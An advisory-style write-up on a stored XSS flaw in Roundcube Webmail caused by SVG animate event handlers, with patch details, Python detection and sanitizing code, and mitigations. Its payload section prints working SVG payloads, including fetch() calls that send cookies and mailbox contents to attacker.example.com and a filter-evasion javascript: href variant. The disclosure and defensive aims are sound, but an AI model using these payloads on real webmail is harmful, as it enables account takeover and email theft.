Vulnerability Summary
Vulnerability Name: Cross-Site Scripting via SVG Animate Tag
CVE ID: CVE-2025-68461
Severity: High
CVSS Score: 7.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE Classification: CWE-79 – Improper Neutralization of Input During Web Page Generation
Exploitability: Network-based, remotely exploitable, no authentication required, no user interaction required
Overview
CVE-2025-68461 is a high-severity cross-site scripting (XSS) vulnerability affecting the Roundcube Webmail application. The issue exists in how Roundcube processes and sanitizes SVG (Scalable Vector Graphics) content, specifically SVG files that use the <animate> element with JavaScript-capable event handlers.
The vulnerability allows an attacker to embed malicious JavaScript inside SVG graphics sent through email. When the email is rendered by Roundcube’s HTML message viewer, the malicious code executes automatically in the victim’s browser. The victim does not need to click a link, download a file, or interact with the message in any special way.
This flaw was discovered and responsibly disclosed by Valentin T. from CrowdStrike and later fixed by the Roundcube development team.
Root Cause Analysis
Roundcube includes an HTML sanitization component (rcube_washtml.php) designed to block dangerous HTML and JavaScript from emails. While this sanitizer correctly filters common threats such as <script> tags and inline JavaScript, it fails to treat SVG animation event handlers as executable code.
SVG is an XML-based image format that browsers render natively. The SVG specification supports animation through the <animate> tag, which includes lifecycle event handlers such as:
- onbegin: executes when the animation starts
- onend: executes when the animation finishes
- onrepeat: executes on each animation loop
Roundcube allows SVG elements as part of legitimate email rendering. However, its sanitizer mistakenly treats animation event attributes as harmless metadata rather than executable JavaScript. This oversight enables attackers to inject JavaScript that runs automatically when the SVG is rendered.
Because the JavaScript runs in the context of the Roundcube web application, it inherits the victim’s session privileges.
Scope and Impact
The CVSS scope is marked as Changed (S:C): the vulnerable component is Roundcube's server-side sanitizer, but the impact lands in the victim's browser, where the injected script runs in the security context of the webmail origin. Successful exploitation allows attackers to:
- Steal session cookies and authentication tokens
- Hijack active email sessions
- Read private and confidential emails
- Send emails as the victim
- Modify mailbox rules, forwarding settings, or filters
- Launch follow-up phishing or lateral attacks
For organizations using Roundcube internally, this vulnerability poses a serious risk to sensitive business communications, regulated data, and intellectual property.
Affected Versions
Vulnerable Versions
- Roundcube Webmail 1.5.x prior to 1.5.12
- Roundcube Webmail 1.6.x prior to 1.6.12
Patched Versions
- Roundcube Webmail 1.5.12
- Roundcube Webmail 1.6.12
The patches were released on December 13, 2025.
Official Advisory:
https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12
Patch Commit:
https://github.com/roundcube/roundcubemail/commit/bfa032631c36b900e7444dfa278340b33cbf7cdb
Immediate upgrading is strongly recommended.
Technical Exploitation Flow
- Email Delivery
- Email Delivery: The attacker sends an HTML email containing an embedded SVG graphic or an SVG attachment. Because Roundcube renders HTML emails automatically, the SVG loads as soon as the message is viewed.
- Malicious SVG Construction: The SVG contains an <animate> element with one or more event handlers, such as onbegin, whose value is JavaScript code.
- Sanitizer Bypass: Roundcube's sanitizer allows the SVG and fails to remove the animation event handler attributes.
- Automatic JavaScript Execution: When the browser renders the SVG, the animation starts automatically, triggering the JavaScript payload.
- Session Compromise: The attacker's JavaScript runs with the victim's authenticated session. It can read the DOM, issue requests to Roundcube as the user, and read any cookie or storage value that is not protected by the HttpOnly flag.
Exploitation Payload Examples
Proof-of-Concept Alert
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<animate attributeName="x"
from="0"
to="10"
dur="1s"
onbegin="alert('XSS via CVE-2025-68461')" />
</svg>
Session Theft Payload
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<animate attributeName="foo"
from=""
to="1"
dur="0.1s"
onbegin="fetch('https://attacker.example.com/exfil?cookie=' + document.cookie + '&session=' + localStorage.getItem('roundcube_sessid'))" />
</svg>
Caveat: Roundcube sets its roundcube_sessid session cookie with the HttpOnly flag and does not keep the session identifier in localStorage, so on a default installation this payload exfiltrates little of value. That does not reduce the severity: script running on the webmail origin can issue authenticated requests itself (read messages, send mail, change identities or filters) without ever seeing the cookie, and that is the realistic post-exploitation path.
Email Content Exfiltration
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<animate attributeName="opacity"
from="0"
to="1"
dur="0.5s"
onbegin="fetch('https://attacker.example.com/steal', {method:'POST', body:document.querySelector('.messagelist').innerHTML})" />
</svg>
WAF Evasion Variant
<svg xmlns="http://www.w3.org/2000/svg">
<a>
<animate attributeName="href"
dur="5s"
repeatCount="indefinite"
values="https://safe-url?;javascript:alert(1);0" />
<text x="20" y="20">Open attachment</text>
</a>
</svg>
This variant carries no on* attribute at all: the <animate> cycles the enclosing link's href through a javascript: URL, so filters that only pattern-match event-handler names miss it. Unlike the onbegin payloads above, it fires only when the victim clicks the animated link, so it trades the zero-interaction property for evasion.
Detection and Prevention Strategy
Layer 1: Server-Side SVG Validation
Inspect SVG files before display or download by scanning for dangerous patterns such as:
- <script> elements
- javascript: URLs in href and xlink:href attributes (including values animated onto href)
- onbegin=, onend=, onrepeat= and any other on* event attribute
- <foreignObject> elements
Advanced validation should parse SVGs as XML and inspect elements and attributes instead of relying solely on string matching.
Layer 2: Content Disarm and Reconstruction (CDR)
Sanitize SVGs by:
- Allowing only safe graphic elements
- Removing all event handlers and script-capable attributes
- Rebuilding a clean SVG from approved components
This neutralizes malicious payloads while preserving visuals.
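The parse-based check that Layer 1 calls for and the rebuild that Layer 2 describes, as one added example written for this page; it is not Roundcube's rcube_washtml.php or any code from the Roundcube project. It closes the root-cause gap described earlier by treating every on* attribute as executable, including the SMIL lifecycle handlers on <animate>, and it also catches the animated-href variant. The element allow-list, the decision to drop animation elements entirely, and the sample SVGs (constructed to mirror the payloads above) are assumptions of the example.

```python
"""Parse-based SVG scanner and content-disarm rebuild (added example)."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # serialise with a default xmlns
ET.register_namespace("xlink", XLINK_NS)

# Assumed allow-list: static drawing primitives only. No <script>,
# <foreignObject>, <use>, <a> and no SMIL animation elements.
SAFE_ELEMENTS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle",
    "ellipse", "line", "polyline", "polygon", "text", "tspan",
    "linearGradient", "radialGradient", "stop", "clipPath",
}
ANIMATION_ELEMENTS = {"animate", "animateMotion", "animateTransform", "set"}
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}
# Browsers strip ASCII whitespace/control characters before scheme
# detection ("java\tscript:" still runs), so normalise the same way.
_CTRL = re.compile(r"[\x00-\x20]")


def _local(name):
    """Strip ElementTree's '{namespace}' prefix from a tag or attribute."""
    return name.rsplit("}", 1)[-1]


def _is_js_url(value):
    return _CTRL.sub("", value).lower().startswith("javascript:")


def scan_svg(svg_text):
    """Return a list of findings; an empty list means nothing dangerous.

    Walks the parsed tree instead of grepping for 'onbegin=', so attribute
    case, whitespace and quoting tricks do not hide a handler.
    """
    findings = []
    for el in ET.fromstring(svg_text).iter():
        tag = _local(el.tag)
        if tag in ("script", "foreignObject"):
            findings.append(f"element <{tag}>")
        for attr, value in el.attrib.items():
            lname = _local(attr)
            if lname.lower().startswith("on"):      # any event handler
                findings.append(f"<{tag} {lname}> event handler")
            if attr in URL_ATTRS and _is_js_url(value):
                findings.append(f"<{tag}> javascript: href")
        # Animated href: the javascript: URL lives in values/from/to.
        if tag in ANIMATION_ELEMENTS and el.get("attributeName", "").endswith("href"):
            animated = ";".join(el.get(a, "") for a in ("values", "from", "to"))
            if any(_is_js_url(v) for v in animated.split(";")):
                findings.append(f"<{tag}> animates href to javascript:")
    return findings


def _rebuild(el):
    """Copy one element keeping only allow-listed children and attributes."""
    clean = ET.Element(el.tag)
    for attr, value in el.attrib.items():
        if _local(attr).lower().startswith("on"):
            continue                                # drop every handler
        if attr in URL_ATTRS and not value.startswith("#"):
            continue                                # in-document refs only
        clean.set(attr, value)
    clean.text = el.text
    for child in el:
        if _local(child.tag) in SAFE_ELEMENTS:
            sub = _rebuild(child)
            sub.tail = child.tail
            clean.append(sub)
    return clean


def sanitize_svg(svg_text):
    """Content disarm and reconstruction: rebuild a clean SVG from scratch."""
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    return ET.tostring(_rebuild(root), encoding="unicode")


# Constructed samples mirroring the payloads discussed above.
POC_ONBEGIN = ('<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">'
               '<animate attributeName="x" from="0" to="10" dur="1s" '
               'onbegin="alert(1)"/></svg>')
POC_ANIMATED_HREF = ('<svg xmlns="http://www.w3.org/2000/svg"><a>'
                     '<animate attributeName="href" dur="5s" repeatCount="indefinite" '
                     'values="https://safe-url?;javascript:alert(1);0"/>'
                     '<text x="20" y="20">x</text></a></svg>')
BENIGN = ('<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
          '<circle cx="5" cy="5" r="4" fill="red"/></svg>')

if __name__ == "__main__":
    for sample in (POC_ONBEGIN, POC_ANIMATED_HREF, BENIGN):
        print(scan_svg(sample), "->", sanitize_svg(sample))
```

xml.etree.ElementTree is used for brevity; for untrusted input in production, parse with a library that disables entity expansion and DTD processing, or pre-check for a DOCTYPE, before applying the same walk.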
Layer 3: Email Gateway Filtering
Block or quarantine SVG attachments at the mail gateway using:
- Postfix + Amavis rules
- SpamAssassin custom signatures
- Rspamd MIME type restrictions
If SVG files are not business-critical, full blocking is the safest option.
Layer 4: Network Traffic Monitoring
Watch for:
- Outbound HTTP/HTTPS connections after email viewing
- Requests containing cookie=, session=, username=, or password=
- Base64-encoded exfiltration data
- Traffic to newly registered or suspicious domains (e.g., libcdn[.]org)
IDS/IPS tools like Snort or Suricata should be configured to detect these patterns.
Layer 5: Log and Behavioral Analysis
Indicators include:
- SVG attachments viewed unexpectedly
- Rapid session token changes
- Logins from multiple geographic locations
- Emails sent shortly after viewing SVG content
- JavaScript execution errors related to SVG or animate tags
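The Layer 4 and Layer 5 indicators above become actionable when the webmail access log and the egress proxy log are correlated: a client viewing a message and, seconds later, reaching an unknown host with cookie= or a base64 blob in the query. The following is an added example written for this page, not tooling from Roundcube or any vendor. It relies on Roundcube's real message-view URL parameters (_task=mail with _action=show or preview); the combined-format log lines, the ten-second window and the known-good host list are constructed assumptions.

```python
"""Correlate Roundcube message views with suspicious outbound requests."""
import base64
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

# Combined log format; the proxy log is assumed to record the full outbound URL.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
WINDOW = timedelta(seconds=10)                           # assumed window
KNOWN_GOOD = {"mail.corp.example", "cdn.corp.example"}   # assumed allow-list
SENSITIVE = {"cookie", "session", "sessid", "username", "password", "token"}
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")


def parse(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def is_message_view(rec):
    """Roundcube renders a message body on _task=mail&_action=show|preview."""
    q = dict(parse_qsl(urlsplit(rec["url"]).query))
    return q.get("_task") == "mail" and q.get("_action") in ("show", "preview")


def _looks_base64(val):
    if not B64_BLOB.match(val):
        return False
    try:
        base64.b64decode(val, validate=True)
        return True
    except ValueError:
        return False


def suspicious_params(url):
    """Reasons an outbound URL looks like exfiltration (empty list == none)."""
    reasons = []
    for key, val in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key.lower() in SENSITIVE:
            reasons.append(f"sensitive param {key}=")
        if _looks_base64(val):
            reasons.append(f"base64 blob in {key}=")
    return reasons


def correlate(webmail_lines, proxy_lines):
    """Alert on suspicious egress from a client that just viewed a message.

    An alert needs both: a message view from the same IP within WINDOW, and
    a request to a host outside KNOWN_GOOD that is a POST or carries
    suspicious query parameters.
    """
    views = [r for r in map(parse, webmail_lines) if r and is_message_view(r)]
    alerts = []
    for rec in filter(None, map(parse, proxy_lines)):
        host = urlsplit(rec["url"]).hostname
        if host is None or host in KNOWN_GOOD:
            continue
        recent = [v for v in views if v["ip"] == rec["ip"]
                  and timedelta(0) <= rec["ts"] - v["ts"] <= WINDOW]
        reasons = suspicious_params(rec["url"])
        if rec["method"] == "POST":
            reasons.append("POST to unknown host")
        if recent and reasons:
            alerts.append({"client": rec["ip"], "host": host,
                           "reasons": reasons, "after_view": recent[-1]["url"]})
    return alerts


# Constructed sample logs: 10.0.0.5 views a message, then exfiltrates;
# 10.0.0.7 only lists the inbox and browses a news site.
WEBMAIL_LOG = [
    '10.0.0.5 - - [14/Dec/2025:09:15:01 +0000] "GET /?_task=mail&_action=show&_uid=42&_mbox=INBOX HTTP/1.1" 200 5123 "https://mail.corp.example/" "Mozilla/5.0"',
    '10.0.0.7 - - [14/Dec/2025:09:15:30 +0000] "GET /?_task=mail&_action=list&_mbox=INBOX HTTP/1.1" 200 822 "https://mail.corp.example/" "Mozilla/5.0"',
]
PROXY_LOG = [
    '10.0.0.5 - - [14/Dec/2025:09:15:02 +0000] "GET https://attacker.example.com/exfil?cookie=roundcube_sessid%3Dabc123 HTTP/1.1" 200 0 "https://mail.corp.example/" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Dec/2025:09:15:03 +0000] "POST https://attacker.example.com/steal HTTP/1.1" 200 0 "https://mail.corp.example/" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Dec/2025:09:15:04 +0000] "GET https://cdn.corp.example/app.js HTTP/1.1" 200 9000 "https://mail.corp.example/" "Mozilla/5.0"',
    '10.0.0.7 - - [14/Dec/2025:09:15:31 +0000] "GET https://news.example.org/?id=7 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in correlate(WEBMAIL_LOG, PROXY_LOG):
        print(alert)
```

The known-good set stands in for whatever domain reputation or newly-registered-domain feed the environment has; the point of requiring both a preceding message view and a suspicious egress is to keep ordinary browsing from the same workstation out of the alert stream.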
Indicators of Compromise (IOCs)
File-Based
- SVG files containing <animate> with event handlers
- Use of eval(atob()), fetch(), document.cookie
- Very small or unusually large SVG attachments
- Double extensions (e.g., invoice.pdf.svg)
Network-Based
- POST requests to attacker domains
- DNS lookups for newly registered domains
- Exfiltration of cookies or credentials
Authentication-Based
- Impossible travel scenarios
- Concurrent sessions from different regions
- Credential stuffing attempts after session theft
Emergency Mitigations (If Patching Is Delayed)
Until patching is complete:
- Block or force-download SVG attachments in Roundcube (the client_mimetypes configuration option controls which attachment types are displayed inline); note that SVG markup inside an HTML message body is not an attachment and still reaches the HTML sanitizer
- Block SVG MIME types at the web server level
- Enforce strict Content Security Policy headers, rolled out in Content-Security-Policy-Report-Only mode first: Roundcube's own interface relies on inline scripts, so a restrictive script-src without nonces breaks the application
- Enable detailed logging and session monitoring
- Limit Roundcube access to trusted networks or VPN
- Notify users not to open SVG attachments
These measures reduce risk but do not fully eliminate it.
Final Takeaway
CVE-2025-68461 is trivially exploitable: one crafted message, no authentication, and the payload runs as soon as the victim views it, enabling silent session hijacking. Temporary mitigations help, but upgrading to Roundcube 1.5.12 or 1.6.12 is the only complete fix.
Organizations should treat this vulnerability as a priority security issue and verify both patch deployment and post-patch monitoring to ensure no compromise occurred before remediation.
